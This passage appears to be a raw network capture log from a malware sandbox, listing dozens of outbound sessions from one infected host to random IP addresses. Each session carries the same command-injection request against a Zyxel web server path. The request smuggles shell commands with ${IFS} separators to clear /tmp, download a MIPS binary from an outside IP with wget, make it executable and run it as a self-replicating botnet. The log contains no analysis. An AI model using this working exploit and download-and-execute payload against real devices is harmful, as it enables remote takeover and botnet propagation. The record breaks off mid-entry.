                                    Jan 13, 2024 19:02:42.371577978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6440192.168.2.134264027.66.227.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371634007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6441192.168.2.134943073.196.91.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371684074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6442192.168.2.133640892.194.216.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371752024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6443192.168.2.133889486.211.177.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371781111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6444192.168.2.136032674.13.221.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371859074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6445192.168.2.133659039.194.96.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371927023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6446192.168.2.1358904119.151.130.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.371992111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6447192.168.2.13528488.107.244.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372046947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6448192.168.2.1337660206.200.80.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372083902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6449192.168.2.135402219.196.21.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372163057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6450192.168.2.1354920108.86.243.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372215033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6451192.168.2.133982445.246.60.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372240067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6452192.168.2.1352410108.130.43.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372328997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6453192.168.2.134805419.36.24.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372365952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6454192.168.2.135720871.61.49.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372421980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6455192.168.2.1357222151.225.112.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372493029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6456192.168.2.1349200220.45.237.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372522116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6457192.168.2.1335202176.134.164.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372591972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6458192.168.2.1357396166.100.255.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372647047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6459192.168.2.13441942.131.51.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372679949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6460192.168.2.1358852137.239.129.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372766972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6461192.168.2.134861217.151.19.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372837067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6462192.168.2.1344938204.155.168.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372909069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6463192.168.2.134694841.79.115.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.372980118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6464192.168.2.1340414129.225.41.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373044968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6465192.168.2.1353954199.144.241.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373100042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6466192.168.2.135759247.1.37.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373189926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6467192.168.2.135939889.215.161.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373261929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6468192.168.2.1349532112.15.34.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373323917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6469192.168.2.1335268209.225.109.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373377085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6470192.168.2.135345661.142.129.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373445034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6471192.168.2.1332962216.206.170.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373518944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6472192.168.2.1356238155.152.187.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373563051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6473192.168.2.1340278170.229.160.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373620987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6474192.168.2.135912262.136.84.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373682022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6475192.168.2.133980035.56.44.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373745918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6476192.168.2.1341232133.245.181.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373779058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6477192.168.2.1348116193.174.87.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373847008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6478192.168.2.1355556153.221.21.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373902082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6479192.168.2.1356514161.211.105.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.373960018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6480192.168.2.1338358161.124.51.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374038935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6481192.168.2.133629248.51.46.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374109030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6482192.168.2.1347022167.3.233.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374133110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6483192.168.2.133398677.235.53.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374203920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6484192.168.2.1345152150.40.101.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374249935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6485192.168.2.1351856198.46.73.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374325991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6486192.168.2.1360344130.184.109.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374360085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6487192.168.2.133676217.247.196.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374397993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6488192.168.2.1357240131.145.135.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374459028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6489192.168.2.135418446.143.194.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374496937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6490192.168.2.1336806130.223.109.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374567986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6491192.168.2.135380079.114.166.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374645948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6492192.168.2.1358606156.167.22.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374706984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6493192.168.2.1338606113.4.86.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374752045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6494192.168.2.134397293.60.221.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374797106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6495192.168.2.1338688218.3.127.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374844074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6496192.168.2.134702618.139.171.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374878883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6497192.168.2.1355296207.84.48.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.374983072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6498192.168.2.1340804211.138.62.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375027895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6499192.168.2.1338520195.101.253.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375056982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6500192.168.2.1351206213.74.16.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375118971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6501192.168.2.1346852129.169.20.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.375188112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6502192.168.2.1350388162.171.250.230443
                                    TimestampBytes transferredDirectionData
